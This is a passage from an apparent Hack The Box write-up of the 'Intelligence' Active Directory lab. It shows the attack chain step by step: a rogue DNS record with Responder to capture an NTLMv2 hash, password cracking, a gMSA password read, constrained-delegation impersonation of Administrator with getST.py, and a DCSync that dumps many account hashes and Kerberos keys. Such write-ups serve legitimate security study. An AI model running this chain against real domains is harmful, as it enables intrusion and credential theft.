name: _gc._tcp.Default-First-Site-Name._sites

dn: DC=_kerberos._tcp,DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb
name: _kerberos._tcp

dn: DC=_kerberos._tcp.Default-First-Site-Name._sites,DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb
name: _kerberos._tcp.Default-First-Site-Name._sites

dn: DC=_kerberos._udp,DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb
name: _kerberos._udp

dn: DC=_kpasswd._tcp,DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb
name: _kpasswd._tcp

dn: DC=_kpasswd._udp,DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb
name: _kpasswd._udp

dn: DC=_ldap._tcp,DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb
name: _ldap._tcp

dn: DC=_ldap._tcp.Default-First-Site-Name._sites,DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb
name: _ldap._tcp.Default-First-Site-Name._sites

dn: DC=_ldap._tcp.DomainDnsZones,DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb
name: _ldap._tcp.DomainDnsZones

dn: DC=_msdcs,DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb
name: _msdcs

dn: DC=dc,DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb
name: dc

dn: DC=DomainDnsZones,DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb
name: DomainDnsZones
```

Weirdly, no existing records have "web" in their name.

First, start [Responder](https://github.com/lgandx/Responder) in a separate terminal:

```console
opcode@debian$ sudo ./Responder.py -I tun0 -Pv
```

I tried using `samba-tool` to add DNS records, but it failed.  
[krbrelayx](https://github.com/dirkjanm/krbrelayx)'s `dnstool.py` can be used instead:

```console
opcode@debian$ git clone https://github.com/dirkjanm/krbrelayx.git
opcode@debian$ cd krbrelayx
opcode@debian$ python3 dnstool.py -u 'intelligence\Tiffany.Molina' -p 'NewIntelligenceCorpUser9876' -dns-ip 10.10.10.248 -r webb -a add -t A -d 10.10.14.38 intelligence.htb
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully
```

After a long wait, we can grab the encrypted challenge:

```console
[HTTP] Sending NTLM authentication request to 10.10.10.248
[HTTP] GET request from: ::ffff:10.10.10.248  URL: / 
[HTTP] NTLMv2 Client   : 10.10.10.248
[HTTP] NTLMv2 Username : intelligence\Ted.Graves
[HTTP] NTLMv2 Hash     : Ted.Graves::intelligence:1c993f3bc9fc357b:2F22F4FB38865BDF07BFF498860D92DE:0101000000000000600AAC46B421DA01F3D310A0A01DAD4600000000020008004F0049005A00500001001E00570049004E002D0050004500570041005200590030003000560031005A00040014004F0049005A0050002E004C004F00430041004C0003003400570049004E002D0050004500570041005200590030003000560031005A002E004F0049005A0050002E004C004F00430041004C00050014004F0049005A0050002E004C004F00430041004C000800300030000000000000000000000000200000CBA6BCBA60108AEA2D96A8F6D10D317DD8EE34ABD85ADA959B591E423E434E4A0A001000000000000000000000000000000000000900340048005400540050002F0077006500620062002E0069006E00740065006C006C006900670065006E00630065002E006800740062000000000000000000
```

We can attempt to crack the password:

```console
opcode@debian$ john/john --wordlist=/home/opcode/CTF/wordlists/rockyou.txt hash
```

It quickly cracks to `Mr.Teddy`

## Post-credential enumeration - 2

We can check if `Ted.Graves` has permissions over any new SMB share:

```console
root@8090a585010c:~# nxc smb 10.10.10.248 -d intelligence.htb -u 'Ted.Graves' -p 'Mr.Teddy' --shares
SMB         10.10.10.248    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False)
SMB         10.10.10.248    445    DC               [+] intelligence.htb\Ted.Graves:Mr.Teddy 
SMB         10.10.10.248    445    DC               [*] Enumerated shares
SMB         10.10.10.248    445    DC               Share           Permissions     Remark
SMB         10.10.10.248    445    DC               -----           -----------     ------
SMB         10.10.10.248    445    DC               ADMIN$                          Remote Admin
SMB         10.10.10.248    445    DC               C$                              Default share
SMB         10.10.10.248    445    DC               IPC$            READ            Remote IPC
SMB         10.10.10.248    445    DC               IT              READ            
SMB         10.10.10.248    445    DC               NETLOGON        READ            Logon server share 
SMB         10.10.10.248    445    DC               SYSVOL          READ            Logon server share 
SMB         10.10.10.248    445    DC               Users           READ            
```

Nothing new here.  
I also looked inside `Users/Ted.Graves` to no avail.  
I also tried other enumeration steps: looked into LDAP data, looked for credentials with `Get-GPPPassword.py` and tried [pre2k](https://github.com/garrettfoster13/pre2k) but found nothing.  
I also tried [certipy](https://github.com/ly4k/Certipy)

```console
opcode@debian$ certipy find -u 'Ted.Graves' -p 'Mr.Teddy' -dc-ip 10.10.10.248 -vulnerable -stdout
Certipy v4.8.0 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Trying to get CA configuration for 'intelligence-DC-CA' via CSRA
[!] Got error while trying to get CA configuration for 'intelligence-DC-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'intelligence-DC-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'intelligence-DC-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : intelligence-DC-CA
    DNS Name                            : dc.intelligence.htb
    Certificate Subject                 : CN=intelligence-DC-CA, DC=intelligence, DC=htb
    Certificate Serial Number           : 1F0401C5511948AA4C6CE45BC9859454
    Certificate Validity Start          : 2021-04-19 00:40:43+00:00
    Certificate Validity End            : 2026-04-19 00:50:40+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : INTELLIGENCE.HTB\Administrators
      Access Rights
        ManageCertificates              : INTELLIGENCE.HTB\Administrators
                                          INTELLIGENCE.HTB\Domain Admins
                                          INTELLIGENCE.HTB\Enterprise Admins
        ManageCa                        : INTELLIGENCE.HTB\Administrators
                                          INTELLIGENCE.HTB\Domain Admins
                                          INTELLIGENCE.HTB\Enterprise Admins
        Enroll                          : INTELLIGENCE.HTB\Authenticated Users
Certificate Templates                   : [!] Could not find any certificate templates
```

Another failure.

Next, we can look for possible exploit paths with Bloodhound.  
For ingestor, I prefer to use [NetExec](https://github.com/Pennyw0rth/NetExec)'s `--bloodhound` option over [BloodHound.py](https://github.com/fox-it/bloodhound.py) when machine accounts are involved:

```console
root@8090a585010c:~# python3 -m pip install pycryptodome
root@8090a585010c:~# nxc ldap 10.10.10.248 -d intelligence.htb -u 'Ted.Graves' -p 'Mr.Teddy' --bloodhound -ns 10.10.10.248 -c All
SMB         10.10.10.248    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False)
LDAP        10.10.10.248    389    DC               [+] intelligence.htb\Ted.Graves:Mr.Teddy 
LDAP        10.10.10.248    389    DC               Resolved collection methods: session, psremote, objectprops, group, rdp, trusts, container, localadmin, acl, dcom
LDAP        10.10.10.248    389    DC               Done in 00M 19S
LDAP        10.10.10.248    389    DC               Compressing output into /root/.nxc/logs/DC_10.10.10.248_2023-11-28_133759bloodhound.zip
```

Get the file out of the container with:

```console
opcode@debian$ docker cp netexec:/root/.nxc/logs/DC_10.10.10.248_2023-11-28_133759bloodhound.zip ~/
```

We can now start neo4j with:

```console
opcode@debian$ sudo neo4j console
```

Finally, we can run the BloodHound binary:

```console
opcode@debian$ ./BloodHound --in-process-gpu
```

I marked `Tiffany.Molina` and `Ted.Graves` as owned and checked the usual queries.  
Under "Shortest path from Owned Principals", I learnt that `Ted.Graves` belongs to the group `itsupport` and members of this group can read the gMSA password of the machine account `svc_int$`

![1](images/1.png)

We can use `NetExec` to get the gMSA password:

```console
root@8090a585010c:~# nxc ldap 10.10.10.248 -d intelligence.htb -u 'Ted.Graves' -p 'Mr.Teddy' --gmsa
SMB         10.10.10.248    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False)
LDAP        10.10.10.248    636    DC               [+] intelligence.htb\Ted.Graves:Mr.Teddy
LDAP        10.10.10.248    636    DC               [*] Getting GMSA Passwords
LDAP        10.10.10.248    636    DC               Account: svc_int$             NTLM: 6c986cdcb965f2607f894fb257417f8e
```

## Constrained delegation (with Protocol Transition)

After getting the gMSA password, I marked `svc_int$` as owned in BloodHound and tried to find the next step, but I could not find anything there.  
A constrained delegation is possible, and older versions of BloodHound could detect it, but not the newer ones.  
Instead we can use `impacket`'s `findDelegation.py`:

```console
opcode@debian$ findDelegation.py intelligence.htb/Ted.Graves:Mr.Teddy                       
Impacket v0.12.0.dev1+20231012.22017.2de29184 - Copyright 2023 Fortra

AccountName  AccountType                          DelegationType                      DelegationRightsTo      
-----------  -----------------------------------  ----------------------------------  -----------------------
svc_int$     ms-DS-Group-Managed-Service-Account  Constrained w/ Protocol Transition  WWW/dc.intelligence.htb 
```

Therefore, we have a `Constrained Delegation with Protocol Transition` case. Compared to the `without Protocol Transition` case, it is much easier to exploit.  
If protocol transition is enabled, a service can invoke `S4U2Self` to produce a service ticket for arbitrary users to itself, and the tickets obtained through such mechanism have the `forwardable` flag set.  
If the impersonated user is not marked sensitive for delegation or a member of the `Protected Users` group, the ticket can also be used as `additional-ticket` to perform `S4U2Proxy`.

First, we need to ensure that `Administrator` is not marked sensitive for delegation or a member of the `Protected Users` group:

```console
opcode@debian$ ldapsearch -LLL -H ldap://10.10.10.248 -D 'intelligence\Ted.Graves' -w 'Mr.Teddy' -b 'CN=Users,DC=intelligence,DC=htb' "(userAccountControl:1.2.840.113556.1.4.803:=1048576)" sAMAccountName
opcode@debian$ ldapsearch -LLL -H ldap://10.10.10.248 -D 'intelligence\Ted.Graves' -w 'Mr.Teddy' -b 'CN=Protected Users,CN=Users,DC=intelligence,DC=htb' "(objectClass=*)" member
dn: CN=Protected Users,CN=Users,DC=intelligence,DC=htb
```

We can proceed with the exploitation then. `getST.py` would invoke both `S4U2Self` and `S4U2Proxy` in the same command:

```console
opcode@debian$ sudo ntpdate intelligence.htb
opcode@debian$ getST.py intelligence.htb/'svc_int$'@dc.intelligence.htb -hashes :6c986cdcb965f2607f894fb257417f8e -impersonate Administrator -spn 'WWW/dc.intelligence.htb'
Impacket v0.12.0.dev1+20231012.22017.2de29184 - Copyright 2023 Fortra

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*]     Requesting S4U2self
[*]     Requesting S4U2Proxy
[*] Saving ticket in Administrator.ccache
```

The obtained ticket can be used with `secretsdump.py` to perform DCsync:

```console
opcode@debian$ export KRB5CCNAME=`pwd`/Administrator.ccache
opcode@debian$ secretsdump.py intelligence.htb/Administrator@dc.intelligence.htb -no-pass -k -just-dc
Impacket v0.12.0.dev1+20231012.22017.2de29184 - Copyright 2023 Fortra

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:9075113fe16cf74f7c0f9b27e882dad3:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9ce5f83a494226352bca637e8c1d6cb6:::
intelligence.htb\Danny.Matthews:1103:aad3b435b51404eeaad3b435b51404ee:9112464222be8b09d663916274dd6b61:::
intelligence.htb\Jose.Williams:1104:aad3b435b51404eeaad3b435b51404ee:9e3dbd7d331c158da69905a1d0c15244:::
intelligence.htb\Jason.Wright:1105:aad3b435b51404eeaad3b435b51404ee:01295a54d60d3d2498aa12d5bbdea996:::
intelligence.htb\Samuel.Richardson:1106:aad3b435b51404eeaad3b435b51404ee:fa7c1a2537f2094bd10e3eddc8e04612:::
intelligence.htb\David.Mcbride:1107:aad3b435b51404eeaad3b435b51404ee:f7aacab8c61105a5d5f99382ace61ddf:::
intelligence.htb\Scott.Scott:1108:aad3b435b51404eeaad3b435b51404ee:b1279fc1d13e461ad3d81cbe5d79c7b5:::
intelligence.htb\David.Reed:1109:aad3b435b51404eeaad3b435b51404ee:5093f8ee65ea9e45aa0c00294d2d2834:::
intelligence.htb\Ian.Duncan:1110:aad3b435b51404eeaad3b435b51404ee:54eecca1b18b2741d81c872e69d7683d:::
intelligence.htb\Michelle.Kent:1111:aad3b435b51404eeaad3b435b51404ee:8bcc0a6ef0f6af2d22c7cdb23916059b:::
intelligence.htb\Jennifer.Thomas:1112:aad3b435b51404eeaad3b435b51404ee:981ae8ccea28b73908b6fa84384f4b22:::
intelligence.htb\Kaitlyn.Zimmerman:1113:aad3b435b51404eeaad3b435b51404ee:b07a75753c543a62b723534a667c39f3:::
intelligence.htb\Travis.Evans:1114:aad3b435b51404eeaad3b435b51404ee:30dd4d476e41b06265b65733136fb36a:::
intelligence.htb\Kelly.Long:1115:aad3b435b51404eeaad3b435b51404ee:a7c756e91ca82214506b523d920e6832:::
intelligence.htb\Nicole.Brock:1116:aad3b435b51404eeaad3b435b51404ee:98613c903c14423b592661c4674044ae:::
intelligence.htb\Stephanie.Young:1117:aad3b435b51404eeaad3b435b51404ee:0ba0e6dbe23c31cea88cd59021ab2f86:::
intelligence.htb\John.Coleman:1118:aad3b435b51404eeaad3b435b51404ee:a8d4315cab221a40f074ba324d81c030:::
intelligence.htb\Thomas.Valenzuela:1119:aad3b435b51404eeaad3b435b51404ee:9d154569044998e5288dbc8db23032b1:::
intelligence.htb\Thomas.Hall:1120:aad3b435b51404eeaad3b435b51404ee:2c605feb1ddfcc1428ac01604369f3eb:::
intelligence.htb\Brian.Baker:1121:aad3b435b51404eeaad3b435b51404ee:138417b615241fea307b3956882d7e32:::
intelligence.htb\Richard.Williams:1122:aad3b435b51404eeaad3b435b51404ee:a921c66a125732a106dceb8ced647961:::
intelligence.htb\Teresa.Williamson:1123:aad3b435b51404eeaad3b435b51404ee:2ae920ebb038642277ca04f8f86ddb9e:::
intelligence.htb\David.Wilson:1124:aad3b435b51404eeaad3b435b51404ee:31549b056a43fcbdf65c70405e751de4:::
intelligence.htb\Darryl.Harris:1125:aad3b435b51404eeaad3b435b51404ee:730ad44839da160afa8bfd3f04a47a50:::
intelligence.htb\William.Lee:1126:aad3b435b51404eeaad3b435b51404ee:64a67569a7f005abf8c7b24654f1f078:::
intelligence.htb\Thomas.Wise:1127:aad3b435b51404eeaad3b435b51404ee:ba93357ccfc73c0dbda18b9d9a97ca6a:::
intelligence.htb\Veronica.Patel:1128:aad3b435b51404eeaad3b435b51404ee:8d8cf98e6d4aae40aaa1c9ef4444368a:::
intelligence.htb\Joel.Crawford:1129:aad3b435b51404eeaad3b435b51404ee:f8b14fe0d95e5edb105115482c7bdb56:::
intelligence.htb\Jean.Walter:1130:aad3b435b51404eeaad3b435b51404ee:ea49f2855d90384ee026a9d09780a0de:::
intelligence.htb\Anita.Roberts:1131:aad3b435b51404eeaad3b435b51404ee:4e2f58237af2453a0ca050cd968fc0a3:::
intelligence.htb\Brian.Morris:1132:aad3b435b51404eeaad3b435b51404ee:ac7b0ea3c16cd6ff264aa85f329e7fd4:::
intelligence.htb\Daniel.Shelton:1133:aad3b435b51404eeaad3b435b51404ee:627d3ac82ca3ecfed61f34db98aa365f:::
intelligence.htb\Jessica.Moody:1134:aad3b435b51404eeaad3b435b51404ee:f6a67905a68c16059ac0aa7e99fbfd05:::
intelligence.htb\Tiffany.Molina:1135:aad3b435b51404eeaad3b435b51404ee:7749fa32e4679d5d071a8d2922675d68:::
intelligence.htb\James.Curbow:1136:aad3b435b51404eeaad3b435b51404ee:cd24b204f3965c7b886b7c7d305d8ed8:::
intelligence.htb\Jeremy.Mora:1137:aad3b435b51404eeaad3b435b51404ee:ab2e8e327fb6353e732f17fb8156038c:::
intelligence.htb\Jason.Patterson:1138:aad3b435b51404eeaad3b435b51404ee:564c8835ccaa0b8f2c0523b7ea4b341d:::
intelligence.htb\Laura.Lee:1139:aad3b435b51404eeaad3b435b51404ee:d7130cfb6752d373280274d07a78cbaf:::
intelligence.htb\Ted.Graves:1140:aad3b435b51404eeaad3b435b51404ee:421001de12db5325304b41275a0407b9:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:c7d9b8314edfcec618bcb2e883ddc0bb:::
svc_int$:1144:aad3b435b51404eeaad3b435b51404ee:6c986cdcb965f2607f894fb257417f8e:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:75dcc603f2d2f7ab8bbd4c12c0c54ec804c7535f0f20e6129acc03ae544976d6
Administrator:aes128-cts-hmac-sha1-96:9091f2d145cb1a2ea31b4aca287c16b0
Administrator:des-cbc-md5:2362bc3191f23732
krbtgt:aes256-cts-hmac-sha1-96:99d40a110afcd64282082cf9d523f11f65b3d142078c1f3121d7fbae9a8c3a26
krbtgt:aes128-cts-hmac-sha1-96:49b9d45a7dd5422ad186041ba9d86a7e
krbtgt:des-cbc-md5:a237bfc8f7b58579
intelligence.htb\Danny.Matthews:aes256-cts-hmac-sha1-96:3470fddc02448815f231bf585fc00165304951d3b04414222be904af7c925473
intelligence.htb\Danny.Matthews:aes128-cts-hmac-sha1-96:72961eb071e69b594f649b2f0cfb38cf
intelligence.htb\Danny.Matthews:des-cbc-md5:98f7736bcb9dc81f
intelligence.htb\Jose.Williams:aes256-cts-hmac-sha1-96:e733cfef56e3fd37eadb3a8b2f0845c2d014ee26892680ed8878632e5019c4ab
intelligence.htb\Jose.Williams:aes128-cts-hmac-sha1-96:94cd916dee769a98ed763a5d864a4486
intelligence.htb\Jose.Williams:des-cbc-md5:d07f38548013d37f
intelligence.htb\Jason.Wright:aes256-cts-hmac-sha1-96:0facd3ad464e633b16454e5e3a2d14bf8460ecc1e39ce2c92788a444b3716f1c
intelligence.htb\Jason.Wright:aes128-cts-hmac-sha1-96:0e85a159ad7605f55817393006e9bd51
intelligence.htb\Jason.Wright:des-cbc-md5:9194da836e8c9238
intelligence.htb\Samuel.Richardson:aes256-cts-hmac-sha1-96:112469103d5114a5355c9db2d4d6d69a1d685390e5c1ec0f1c4c31ab89013b8d
intelligence.htb\Samuel.Richardson:aes128-cts-hmac-sha1-96:16658c2b56df4ed113950bca88fbddaf
intelligence.htb\Samuel.Richardson:des-cbc-md5:d63145758054980e
intelligence.htb\David.Mcbride:aes256-cts-hmac-sha1-96:e820c31eda49f5f5044c0ab8cab56bc7b0ce67369ac5565564a80d9459aa2688
intelligence.htb\David.Mcbride:aes128-cts-hmac-sha1-96:70f82063e0d751c578d3720b0c91c9d1
intelligence.htb\David.Mcbride:des-cbc-md5:0ef11f6bce10f226
intelligence.htb\Scott.Scott:aes256-cts-hmac-sha1-96:965e3bdb31fddef7d225ee0f3bc29da8374b3fbc78db354172599c2d0bbc5a2d
intelligence.htb\Scott.Scott:aes128-cts-hmac-sha1-96:679d6a497c460af78feb18be86c906f0
intelligence.htb\Scott.Scott:des-cbc-md5:40ad61da9e13ec2a
intelligence.htb\David.Reed:aes256-cts-hmac-sha1-96:c4deea07df497a77f6f84582704d304d0ee6a4d49ebd782c39a9a552fef1b2b5
intelligence.htb\David.Reed:aes128-cts-hmac-sha1-96:138480edac273065ee620dcd03710dd3
intelligence.htb\David.Reed:des-cbc-md5:e368e9f1e6d5dfa8
intelligence.htb\Ian.Duncan:aes256-cts-hmac-sha1-96:d58821922aab776c8f15c3213a84da5d070c9ad8134e69f8f1546558e18061d8
intelligence.htb\Ian.Duncan:aes128-cts-hmac-sha1-96:29fc796179d2a6626e96c1178ba414c3
intelligence.htb\Ian.Duncan:des-cbc-md5:3d49cdfb8ca24357
intelligence.htb\Michelle.Kent:aes256-cts-hmac-sha1-96:aaf5ba002819705fb89e5dcbaffedb2c4c0909dbf6dc2274eade8ba4c4c03c6f
intelligence.htb\Michelle.Kent:aes128-cts-hmac-sha1-96:c7b85b205732e43876e1b139559d088e
intelligence.htb\Michelle.Kent:des-cbc-md5:5279cbe91a37855b
intelligence.htb\Jennifer.Thomas:aes256-cts-hmac-sha1-96:3bf38c83a092897d6da8308fdf759125d0b04ef670419f9c1079687e05105013
intelligence.htb\Jennifer.Thomas:aes128-cts-hmac-sha1-96:c9b5fda759614149e75a7a694773c628
intelligence.htb\Jennifer.Thomas:des-cbc-md5:ecbc4aaecd64d6d9
intelligence.htb\Kaitlyn.Zimmerman:aes256-cts-hmac-sha1-96:4c96bddc73accb5b94105ddff69cca796a4b394836f6c5621ef9b063eeb0613a
intelligence.htb\Kaitlyn.Zimmerman:aes128-cts-hmac-sha1-96:b272f50bd0c5fc39eb4a16d8baa52ac3
intelligence.htb\Kaitlyn.Zimmerman:des-cbc-md5:f84f2af20454c704
intelligence.htb\Travis.Evans:aes256-cts-hmac-sha1-96:971c2ec7ea7608a702b256888d9f1c934edaae423c1dd903ce78a3665fb420e0
intelligence.htb\Travis.Evans:aes128-cts-hmac-sha1-96:f32b62ee858b6f2418f83ce0e0ef7724
intelligence.htb\Travis.Evans:des-cbc-md5:c8f46dd313c40df2
intelligence.htb\Kelly.Long:aes256-cts-hmac-sha1-96:b9f50686f16c21ed608acc6e8dabd9087b0a2ca2b5ed48ffab4e97f0ddcca58d
intelligence.htb\Kelly.Long:aes128-cts-hmac-sha1-96:780bc7c8cb901a9edcc946b37cfb4b3b
intelligence.htb\Kelly.Long:des-cbc-md5:25381cef0229914a
intelligence.htb\Nicole.Brock:aes256-cts-hmac-sha1-96:c0c526274cee689a0a4c824b6b37a9c75d2f67b0ebfa4b442730e9ebbbca2eec
intelligence.htb\Nicole.Brock:aes128-cts-hmac-sha1-96:a61d2b568b9b3535fc21d24975127db3
intelligence.htb\Nicole.Brock:des-cbc-md5:1554e3702a1954bc
intelligence.htb\Stephanie.Young:aes256-cts-hmac-sha1-96:ea36d54289dd438b308da64ab3b69a23a644e8f6808530bcda8882881905a8fd
intelligence.htb\Stephanie.Young:aes128-cts-hmac-sha1-96:018222835d22f07d1c252cd6fa0710eb
intelligence.htb\Stephanie.Young:des-cbc-md5:461ffd7cfbc8f719
intelligence.htb\John.Coleman:aes256-cts-hmac-sha1-96:8067bb73df474595a8bc723f4de2ab0a86fb910d93f0ab6102e3fb63768c8403
intelligence.htb\John.Coleman:aes128-cts-hmac-sha1-96:c79cab0353ad47f96ad2535c1532e3b4
intelligence.htb\John.Coleman:des-cbc-md5:1a8f61daf88cada4
intelligence.htb\Thomas.Valenzuela:aes256-cts-hmac-sha1-96:6ece4d420a8b29d9ecbe3cfe8fdd3acb2d5f1ae08df82e793ad381ce9c438519
intelligence.htb\Thomas.Valenzuela:aes128-cts-hmac-sha1-96:1adc220bb780a27c2e132e6f56b300e1
intelligence.htb\Thomas.Valenzuela:des-cbc-md5:4a20f2cbc48f4a25
intelligence.htb\Thomas.Hall:aes256-cts-hmac-sha1-96:42c2083058468fdd87d99f499f1bf28d2e1fe52ca9905749449870350e122538
intelligence.htb\Thomas.Hall:aes128-cts-hmac-sha1-96:92689a74b9c5049685c1eab8191d1059
intelligence.htb\Thomas.Hall:des-cbc-md5:c1689415d0b349cd
intelligence.htb\Brian.Baker:aes256-cts-hmac-sha1-96:af4bde66e34333e9ac6347e990683a204449b35d59d16799890aa7373379a209
intelligence.htb\Brian.Baker:aes128-cts-hmac-sha1-96:2091fe2a67c3112abf4d86341b08a020
intelligence.htb\Brian.Baker:des-cbc-md5:20854cb0bf7f08cb
intelligence.htb\Richard.Williams:aes256-cts-hmac-sha1-96:39d20f1d098b0d11c76d46c796a00e485ccdb75888ab21a5e8ad48d9c43a9f99
intelligence.htb\Richard.Williams:aes128-cts-hmac-sha1-96:62051aea798dac4b50a7473bdf819357
intelligence.htb\Richard.Williams:des-cbc-md5:f78554f740a8fd37
intelligence.htb\Teresa.Williamson:aes256-cts-hmac-sha1-96:953ba46a1f1ab8452af44b430ccfbefd6aa365ce3c8472a6b69703a61ab9f852
intelligence.htb\Teresa.Williamson:aes128-cts-hmac-sha1-96:dd78207d6785612eb9f82041229b9115
intelligence.htb\Teresa.Williamson:des-cbc-md5:64e925a40408dae9
intelligence.htb\David.Wilson:aes256-cts-hmac-sha1-96:694ece7501043ef160eb03387f6a307821325720c8bacad867f9ecd450728080
intelligence.htb\David.Wilson:aes128-cts-hmac-sha1-96:55363f7a6a44fa20d0e5a11194effce9
intelligence.htb\David.Wilson:des-cbc-md5:ec16c87f6e23c89b
intelligence.htb\Darryl.Harris:aes256-cts-hmac-sha1-96:a84f076f19ce91192267337b3d193925f994f1b33da20b39e90da2fba7071bdd
intelligence.htb\Darryl.Harris:aes128-cts-hmac-sha1-96:e5725af1790497d9674a6b5a3c58994b
intelligence.htb\Darryl.Harris:des-cbc-md5:0bfe23d3e6d668c4
intelligence.htb\William.Lee:aes256-cts-hmac-sha1-96:ad8cf538481b64edf9df94e5fa9db14b2df9dc9bbbb4a505f8d576b30b6068dd
intelligence.htb\William.Lee:aes128-cts-hmac-sha1-96:0f468f9c3a56be7173331778c3b61a22
intelligence.htb\William.Lee:des-cbc-md5:237083ea75b0a1a2
intelligence.htb\Thomas.Wise:aes256-cts-hmac-sha1-96:a3a513ffaba7ff91bb4b0c96bea6d891ba8ab7fd45e260c8369d91a01c74b6e7
intelligence.htb\Thomas.Wise:aes128-cts-hmac-sha1-96:9027d42b650d6f3d98d0d31a713fd6d1
intelligence.htb\Thomas.Wise:des-cbc-md5:a76de0fba7892ce6
intelligence.htb\Veronica.Patel:aes256-cts-hmac-sha1-96:c7841eb0f843a15d0868c416e8f02e638400c0b789f861e5f126e41da7f5804d
intelligence.htb\Veronica.Patel:aes128-cts-hmac-sha1-96:065c8b582be8b0fd944b9db1ed6523ed
intelligence.htb\Veronica.Patel:des-cbc-md5:73a12af8d954f794
intelligence.htb\Joel.Crawford:aes256-cts-hmac-sha1-96:ba65147177659d607593ee0d4db39f83eb03d33955d64f690db82db793fbde42
intelligence.htb\Joel.Crawford:aes128-cts-hmac-sha1-96:7e1bce51c6b4cb73bdff47d0a54e3854
intelligence.htb\Joel.Crawford:des-cbc-md5:da806716e3a7106d
intelligence.htb\Jean.Walter:aes256-cts-hmac-sha1-96:97b7305619dba3d3f68f028860831335a6e86617a6a91cb4fad5ce25f7b5103f
intelligence.htb\Jean.Walter:aes128-cts-hmac-sha1-96:342909445b423a96346d786cf8e0750b
intelligence.htb\Jean.Walter:des-cbc-md5:f4ecbcb50e92155d
intelligence.htb\Anita.Roberts:aes256-cts-hmac-sha1-96:e4391edabdb89fe6fb3fe65c291299adbf1e4fd4fed15db38a1033986697a9d0
intelligence.htb\Anita.Roberts:aes128-cts-hmac-sha1-96:f894501ce29399a462da02f2df2af106
intelligence.htb\Anita.Roberts:des-cbc-md5:d902c791dfb9a4d3
intelligence.htb\Brian.Morris:aes256-cts-hmac-sha1-96:d8636a754109f191f067818da6420b3441d95457d1e31df5d9cd05a0eec4b65e
intelligence.htb\Brian.Morris:aes128-cts-hmac-sha1-96:45a0da625e5283ee353d10d25140f31a
intelligence.htb\Brian.Morris:des-cbc-md5:df2f2cd5d5e58f6d
intelligence.htb\Daniel.Shelton:aes256-cts-hmac-sha1-96:00f5f28e941558ba6c1bcc4fb674b50785633510c10b265e56a611f8845f2aba
intelligence.htb\Daniel.Shelton:aes128-cts-hmac-sha1-96:d14fb2ad083d60ed0ac0b5d12c5bc24d
intelligence.htb\Daniel.Shelton:des-cbc-md5:8643b991cdf1c146
intelligence.htb\Jessica.Moody:aes256-cts-hmac-sha1-96:ceec226b171f795b66c965a2e50c22a939d6b36102245c0e01e8d6cc45791e7b
intelligence.htb\Jessica.Moody:aes128-cts-hmac-sha1-96:2192e448419e2fb019b929e0ad7fbbef
intelligence.htb\Jessica.Moody:des-cbc-md5:fe9434706d0b674c
intelligence.htb\Tiffany.Molina:aes256-cts-hmac-sha1-96:fd72395eff4e22dfd26752c2648b6fa45331662abf917fe5b38d5ec578ad2271
intelligence.htb\Tiffany.Molina:aes128-cts-hmac-sha1-96:eee1655069dc004e3118634907c6a689
intelligence.htb\Tiffany.Molina:des-cbc-md5:37cde5134acba76b
intelligence.htb\James.Curbow:aes256-cts-hmac-sha1-96:aa40673df918aa36bf90bd7a6022f9a223ae2d2c2b54429bf1cb61a152a78ff8
intelligence.htb\James.Curbow:aes128-cts-hmac-sha1-96:ee89e49bea0fbc792be16d4d4cf1cf9d
intelligence.htb\James.Curbow:des-cbc-md5:f40ea738f76e1397
intelligence.htb\Jeremy.Mora:aes256-cts-hmac-sha1-96:c66ae8416b999d44c5b1a8cd945bae0d6ea86e7891f1f190c2d1da34b7dc6eaa
intelligence.htb\Jeremy.Mora:aes128-cts-hmac-sha1-96:757159175f1741317bfce199ec749b00
intelligence.htb\Jeremy.Mora:des-cbc-md5:a1865bd957797038
intelligence.htb\Jason.Patterson:aes256-cts-hmac-sha1-96:d2360bcbf255e5226485b07e0a2e66e94bb296a3deac0b8c7ef0419ac9cbbe52
intelligence.htb\Jason.Patterson:aes128-cts-hmac-sha1-96:4524a326d3ee31b4900576e44bdb52bf
intelligence.htb\Jason.Patterson:des-cbc-md5:80a7f1b36de0adda
intelligence.htb\Laura.Lee:aes256-cts-hmac-sha1-96:06edfbbd11c97570ec8d951f7aebeafebc0b507515457a3118d2ff905ec3c00f
